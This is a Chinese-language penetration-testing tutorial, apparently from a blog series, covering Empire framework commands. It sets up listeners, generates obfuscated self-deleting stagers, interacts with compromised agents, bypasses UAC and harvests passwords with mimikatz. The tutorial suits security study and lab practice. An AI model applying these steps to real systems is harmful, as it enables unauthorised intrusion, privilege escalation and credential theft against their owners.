內網滲透 day14-empire基礎命令的使用

empire的基礎操做

1. 創建監聽器

help    查看幫助命令

listeners     查看監聽器

uselistener  xxx     使用監聽器模塊

經常使用的監聽模塊：http

按兩次tab鍵查看能使用的監聽器模塊

info    查看參數信息

設置參數

set Name xxx

set Host http://xxx

set Port xxx

執行：execute

main 返回主菜單

這邊顯示目前有一個活躍的監聽器

2. 設置stagers

usestagers xxx   使用stager模塊

經常使用的模塊：windows/hta、windows/launcher_bat

按兩次tab鍵查看能使用的stager模塊

info  查看要設置的參數

set Listener xx     設置監聽器

set OutFile /var/www/html/launcher.bat 設置文件生成路勁

delete   木馬運行完是否自動刪除

Obfuscate（混淆）

execute 執行

在靶機上雙擊bat文件成功反彈會話

3. 用戶交互

agents 切換到用戶列表

list 列出用戶

rename 修改用戶ID的名字

interact 進入到用戶交互界面

sysinfo     查看系統信息

sc  截屏

searchmodule 搜索模塊

shell + command 執行命令

spawn 遷移到新的用戶須要指定監聽器的名字

產生了一個新的會話

用戶清除:

kill agents | all

監聽器清除：

kill listener | all

4. 提權

繞過uac

bypassuac  <listener>      bypassuac繞過uac提權

能夠看到產生了一個帶*的會話，提權成功用戶名前面會多一個*號

mimikatz      在擁有權限後能夠利用mimikatz獲取用戶帳號密碼

creds         以列表的形式顯示mimikatz獲取的帳號密碼

uac提權（須要手動確認）

searchmodule ask 搜索ask模塊

usemodule privesc/ask       使用privesc/ask模塊

info    查看所需參數

設置監聽器

run   執行

靶機彈出uac認證框

列表中產生新的管理員會話